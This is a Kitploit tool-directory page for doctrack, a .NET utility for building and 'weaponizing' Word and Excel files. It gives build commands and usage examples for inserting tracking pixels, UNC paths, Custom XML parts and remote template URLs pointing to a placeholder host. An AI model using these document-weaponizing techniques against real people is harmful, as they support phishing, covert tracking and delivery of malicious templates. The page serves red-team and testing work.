Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
doctrack — Tool to manipulate and weaponize Office Open XML documents. | Kitploit
Tools/GitHubGitHub/wavvs/doctrack
Phishing ToolsPayload GenerationInformation GatheringRed Teaming
GitHubwavvs/doctrack

doctrack

Tool to manipulate and weaponize Office Open XML documents.

View Repository
72183 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Doctrack

Tool to manipulate and weaponize Office Open XML documents.

Features

  • Create Office Open XML documents (Word, Excel)
  • Insert tracking pixels and UNC paths
  • Remote Template injection
  • Insert CustomXML parts
  • Inspect external target URLs, metadata and Custom XML parts

Installation

You will need to download .Net 6.0. Then, to build a single binary on Windows:

root@kitploit:~
$ git clone https://github.com/wavvs/doctrack.git
$ cd doctrack/
$ dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true

On Linux:

root@kitploit:~
$ dotnet publish -r linux-x64 -c Release /p:PublishSingleFile=true

Usage

root@kitploit:~
$ doctrack --help
Tool to manipulate and weaponize Office Open XML documents.

  -i, --input          Input filename. If doesn't exist, new file is created.
  -o, --output         Output filename. If not set, document is saved as --input
                       file.
  -m, --metadata       Metadata to supply (JSON file).
  -u, --url            URL to insert.
  -e, --template       (Default: false) If set, enables template URL injection.
  -s, --inspect        (Default: false) Inspect document.
  -c, --custom-part    Insert a Custom XML part (XML file)
  --help               Display this help screen.

Create a Word document and change document metadata:

root@kitploit:~
$ doctrack -i test.docx -m metadata.json

Insert a tracking pixel and change document metadata:

root@kitploit:~
$ doctrack -i test.docx -o test.docx --metadata metadata.json --url http://test.url/image.png

Insert a remote template URL (aka Remote Template Injection):

root@kitploit:~
$ doctrack -i test.docx -o test.docx --url http://test.url/template.dotm --template

Insert a Custom XML part:

root@kitploit:~
$ doctrack -i test.docx -o test.docx -c part.xml

Inspect external target URLs, metadata and Custom XML parts:

root@kitploit:~
$ doctrack -i test.docx --inspect
[External targets]
Part: /word/document.xml, ID: R8783bc77406d476d, URI: http://test.url/image.png
Part: /word/settings.xml, ID: R33c36bdf400b44f6, URI: http://test.url/template.dotm

[Metadata]
Creator: wavvs
Title: doctrack
Subject:
Category:
Keywords:
Description:
ContentType:
ContentStatus:
Version:
Revision:
Created: 13.10.2020 23:20:39
Modified: 13.10.2020 23:20:39
LastModifiedBy:
LastPrinted: 13.10.2020 23:20:39
Language:
Identifier:

[CustomXML Parts]
Part: /customXML/item.xml (25 bytes)
Download Tool